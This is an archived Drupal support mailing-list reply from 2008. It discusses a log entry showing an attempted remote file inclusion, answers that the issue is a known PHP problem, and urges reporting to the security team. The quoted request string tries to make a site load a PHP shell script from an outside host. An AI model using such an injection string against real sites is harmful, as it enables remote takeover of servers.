[support] Strange url from log
Greg Knaddison
greg at pingvox.com
Sun Jan 6 19:39:14 UTC 2008
Hi,
The most important thing here is that when you have a potential
security issue the proper way to submit it is documented on
http://drupal.org/security-team which can also be found via
http://drupal.org/security If you send the potential exploit to a
public channel like a listserve or the Drupal.org issue queue, then
that makes the job of the security team and all other Drupal users
much harder because everyone has to scramble to find a fix and get it
installed as soon as possible.
On Jan 6, 2008 6:17 PM, michel <michel at ziobudda.net> wrote:
> drupal/?_menu[callbacks][1][callback]=http://my3dwork.com/images/on.txt?
>
> where http://my3dwork.com/images/on.txt is a php shell script.
>
> any 0-day bug ?
This is not a bug in Drupal per se, but rather a PHP bug. Because the
Security Team was seeing a few reports of logs like this we decided to
make a "Public Service Announcement" back in October -
http://drupal.org/node/184313 That announcement describes the nature
of the problem and the proper actions to take to prevent the attack
from succeeding on your site.
Regards,
Greg
--
Greg Knaddison
Denver, CO | http://knaddison.com
World Spanish Tour | http://wanderlusting.org/user/greg
More information about the support
mailing list